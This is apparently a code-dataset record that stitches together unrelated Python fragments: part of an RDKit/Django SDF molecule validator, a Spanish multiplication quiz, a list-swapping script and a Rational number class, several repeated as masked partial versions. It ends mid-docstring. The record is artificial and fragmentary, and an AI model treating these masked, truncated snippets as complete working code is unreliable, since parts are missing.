if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field=key,
warning_string='description for %s missing' % (key,),
validate_dict=validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field=key,
warning_string='illegal URL %s provided' % (value,),
validate_dict=validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
    # Compulsory fields
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key,
warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
    Checks if the URL provided is well-formed. No internet connection required.
    Checks URL using the Validators package
    :value: value associated with 'ref_url' key
    :return: False if URL cannot be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name,
field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field,
warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
# check for missing fields
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [],
'field': [],
'warning_string': []}
# Check sdf filename & can be read
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol',
field='N/A',
warning_string='your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done',
validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
# all mol checks
# - all mols have the same properties
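    # (gathers the union of property keys across all molecules, then flags any
    #  key from that union that a given molecule lacks)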
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
        diff_list = np.setdiff1d(unique_props, props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'),
field='property (missing)',
warning_string='%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
# Check version in blank mol
validate_dict = check_ver_name(blank_mol, version, validate_dict)
    # Check compulsory fields in blank mol props
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
# Check properties have been described and validate url
validate_dict = check_blank_prop(blank_mol, validate_dict)
# main mols checks
    # - missing compulsory fields
    # - check name characters
    # - check pdb assignment and if pdb filepath exists
    # - check compulsory field populated
    # - check SMILES can be opened by rdkit
# (check api for pdb if fragalysis)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
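# Hedged usage sketch: how validate() might be driven from a Django shell. The
# filename and target below are illustrative assumptions, not values taken from
# this module.
#   results, ok = validate('compound-set_fragmenstein.sdf', target='Mpro')
#   if not ok:
#       for name, field, warning in zip(results['molecule_name'],
#                                       results['field'],
#                                       results['warning_string']):
#           print(name, field, warning)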
| [
9,
10,
14,
16,
18
] |
655 | 48bc5d4b191fa631650b60240560dbece6396312 | <mask token>
| <mask token>
while cantidad <= 0:
print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
<mask token>
print('Le corresponde una nota de %.2f' % nota)
| <mask token>
cantidad = int(input('Numero de preguntas: '))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
nota = contador_bien / cantidad * 10
print('Le corresponde una nota de %.2f' % nota)
| from random import randint
cantidad = int(input('Numero de preguntas: '))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print('El numero de preguntas debe ser al menos 1')
cantidad = int(input('Numero de preguntas: '))
for i in range(cantidad):
numero = randint(2, 10)
numero2 = randint(2, 10)
aleatorio = int(input('¿Cuanto es %d * %d? ' % (numero, numero2)))
if numero * numero2 == aleatorio:
print('Correcto')
contador_bien = contador_bien + 1
else:
print('Incorrecto')
contador_mal = contador_mal + 1
print('Ha contestado bien', contador_bien, 'preguntas')
print('Ha contestado mal', contador_mal, 'preguntas')
nota = contador_bien / cantidad * 10
print('Le corresponde una nota de %.2f' % nota)
| from random import randint
cantidad = int(input("Numero de preguntas: "))
contador_bien = 0
contador_mal = 0
while cantidad <= 0:
print ("El numero de preguntas debe ser al menos 1")
cantidad = int(input("Numero de preguntas: "))
for i in range(cantidad):
numero = randint(2,10)
numero2 = randint(2,10)
aleatorio = int(input("¿Cuanto es %d * %d? " % (numero, numero2)))
if numero * numero2 == aleatorio:
print ("Correcto")
contador_bien = contador_bien + 1
else:
print ("Incorrecto")
contador_mal = contador_mal + 1
print ("Ha contestado bien", contador_bien, "preguntas")
print ("Ha contestado mal", contador_mal, "preguntas")
nota = (contador_bien / cantidad) * 10
print ("Le corresponde una nota de %.2f"%nota) | [
0,
1,
2,
3,
4
] |
656 | 18435f43e2f52e3d2e9ff6411f8dd0510d2da54d | <mask token>
| <mask token>
if n % 2 == 0:
for i in range(0, n // 2):
a[i], a[n // 2 + i] = a[n // 2 + i], a[i]
print('after swap:', a)
else:
for i in range(0, n // 2):
a[i], a[n // 2 + i + 1] = a[n // 2 + i + 1], a[i]
print('after swap:', a)
| a = eval(input('enter a list: '))
n = len(a)
if n % 2 == 0:
for i in range(0, n // 2):
a[i], a[n // 2 + i] = a[n // 2 + i], a[i]
print('after swap:', a)
else:
for i in range(0, n // 2):
a[i], a[n // 2 + i + 1] = a[n // 2 + i + 1], a[i]
print('after swap:', a)
| a=eval(input('enter a list: '))
n=len(a)
if (n%2==0):
for i in range(0,n//2):
a[i],a[n//2+i]=a[n//2+i],a[i]
print('after swap:',a)
else:
for i in range(0,n//2):
a[i],a[n//2+i+1]=a[n//2+i+1],a[i]
print('after swap:',a)
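# Worked examples derived from the logic above:
#   enter a list: [1, 2, 3, 4]    -> after swap: [3, 4, 1, 2]
#   enter a list: [1, 2, 3, 4, 5] -> after swap: [4, 5, 3, 1, 2]
# (for odd lengths the middle element keeps its position)
# Note: eval(input(...)) will execute arbitrary expressions; for literal lists,
# ast.literal_eval(input('enter a list: ')) would be a safer drop-in.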
| null | [
0,
1,
2,
3
] |
657 | b1ab28a99fdcce66f0a1e4e25821073673f531cf | <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
<mask token>
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
<mask token>
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
<mask token>
<mask token>
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
<mask token>
<mask token>
<mask token>
<mask token>
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
<mask token>
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
<mask token>
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
<mask token>
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
<mask token>
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
    @property
    def num(self):
        """
        returns numerator of Rational
        """
        return self._num
    @property
    def den(self):
        """
        returns denominator of Rational
        """
        return self._den
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
<mask token>
    @property
    def num(self):
        """
        returns numerator of Rational
        """
        return self._num
    @property
    def den(self):
        """
        returns denominator of Rational
        """
        return self._den
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Rational(object):
<mask token>
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
def __add__(self, other):
"""
'+' operator
"""
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.
den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
def __sub__(self, other):
"""
'-' binary operator
"""
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.
den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(-other)
return NotImplemented
def __mul__(self, other):
"""
'*' operator
"""
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
<mask token>
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return quot, res
return NotImplemented
def __pos__(self):
"""
'+' unary operator
"""
return self
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
def __lt__(self, other):
"""
'<' operator
"""
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
def __le__(self, other):
"""
'<=' operator
"""
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
def __eq__(self, other):
"""
'==' operator
"""
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
def __gt__(self, other):
"""
'>' operator
"""
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
def __ge__(self, other):
"""
'>=' operator
"""
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
def __str__(self):
"""
'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
def isinteger(self):
"""
        Does this Rational instance represent an integer?
"""
return self.den == 1
    @property
    def num(self):
        """
        returns numerator of Rational
        """
        return self._num
    @property
    def den(self):
        """
        returns denominator of Rational
        """
        return self._den
@staticmethod
def parse(string):
"""
parse string to Rational
"""
posslash = string.find('/')
if posslash < 0:
return Rational(int(string), 1)
else:
strs = string.split('/')
return Rational(int(strs[0].strip()), int(strs[1].strip()))
<mask token>
<mask token>
<mask token>
| """
module rational number
"""
def _gcd(num_a, num_b):
"""
    greatest common divisor
"""
if num_a == 0 or num_b == 0:
raise ArithmeticError('gcd of zero')
var_p = num_a
var_q = num_b
if var_p < var_q:
var_p = num_b
var_q = num_a
var_r = var_p % var_q
while var_r != 0:
var_p = var_q
var_q = var_r
var_r = var_p % var_q
return var_q
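# Quick sanity examples for _gcd (illustrative; both arguments must be non-zero):
#   _gcd(12, 18) -> 6    _gcd(7, 5) -> 1    _gcd(100, 10) -> 10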
class Rational(object):
"""
representing rational number
"""
def __init__(self, num, den):
"""
simple constructor
"""
if den == 0:
raise ZeroDivisionError('division by zero')
if num == 0:
self._num = 0
self._den = 1
else:
sign = 1
if num * den < 0:
sign = -1
abs_num = abs(num)
abs_den = abs(den)
divisor = _gcd(abs_num, abs_den)
self._num = sign * abs_num // divisor
self._den = abs_den // divisor
#
def __add__(self, other):
"""
'+' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num + self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den + self.den * other.num, self.den * other.den)
def __radd__(self, other):
"""
fallback of '+' operator
"""
if isinstance(other, int):
return self.__add__(other)
return NotImplemented
#
def __sub__(self, other):
"""
'-' binary operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num - self.den * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.den - self.den * other.num, self.den * other.den)
def __rsub__(self, other):
"""
fallback of '-' binary operator
"""
if isinstance(other, int):
return self.__neg__().__add__(- other)
return NotImplemented
#
def __mul__(self, other):
"""
'*' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return Rational(self.num * other, self.den)
if not isinstance(other, Rational):
return NotImplemented
return Rational(self.num * other.num, self.den * other.den)
def __rmul__(self, other):
"""
fallback of '*' operator
"""
return self.__mul__(other)
#
def __truediv__(self, other):
"""
'/' operator when '__future__.division' is in effect
"""
# supported type for operand except Rational
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(self.num, self.den * other)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(self.num * other.den, self.den * other.num)
def __rtruediv__(self, other):
"""
fallback of '/' operator when '__future__.division' is in effect
"""
if isinstance(other, int):
return Rational(self.den * other, self.num)
return NotImplemented
#
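    # The division-like operators below treat Rational as a field element:
    # a // b is defined as exact division, so a % b is always 0 (for b != 0).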
def __floordiv__(self, other):
"""
'//' operator
"""
return self.__truediv__(other)
def __rfloordiv__(self, other):
"""
fallback of '//' operator
"""
return self.__rtruediv__(other)
#
def __div__(self, other):
"""
'/' operator
"""
return self.__truediv__(other)
def __rdiv__(self, other):
"""
fallback of '/' operator
"""
return self.__rtruediv__(other)
#
def __mod__(self, other):
"""
'%' operator
"""
if isinstance(other, int):
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
if not isinstance(other, Rational):
return NotImplemented
if other == 0:
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
def __rmod__(self, other):
"""
fallback of '%' operator
"""
if self == Rational(0, 1):
raise ZeroDivisionError('division by zero')
return Rational(0, 1)
#
def __divmod__(self, other):
"""
'divmod()' operation
"""
quot = self.__floordiv__(other)
res = self.__mod__(other)
if quot != NotImplemented and res != NotImplemented:
return (quot, res)
return NotImplemented
def __rdivmod__(self, other):
"""
fallback of 'divmod()' operation
"""
quot = self.__rfloordiv__(other)
res = self.__rmod__(other)
if quot != NotImplemented and res != NotImplemented:
return (quot, res)
return NotImplemented
#
def __pos__(self):
"""
'+' unary operator
"""
return self
#
def __neg__(self):
"""
'-' unary operator
"""
return Rational(-1 * self.num, self.den)
#
def __abs__(self):
"""
absolute value
"""
return Rational(abs(self.num), self.den)
#
# "rich comparison" method
def __lt__(self, other):
"""
'<' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den < 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den < 0
#
def __le__(self, other):
"""
'<=' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den <= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den <= 0
#
def __eq__(self, other):
"""
'==' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den == 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den == 0
#
def __ne__(self, other):
"""
'!=' or '<>' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den != 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den != 0
#
def __gt__(self, other):
"""
'>' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den > 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den > 0
#
def __ge__(self, other):
"""
'>=' operator
"""
# supported type for operand except Rational
if isinstance(other, int):
return self.num - other * self.den >= 0
if not isinstance(other, Rational):
return NotImplemented
return self.num * other.den - other.num * self.den >= 0
#
def __hash__(self):
"""
calc hash value
"""
return hash((self.num, self.den))
#
def __repr__(self):
"""
'official' string representation
"""
return '<Rational: num=%d, den=%d>' % (self.num, self.den)
#
def __str__(self):
"""
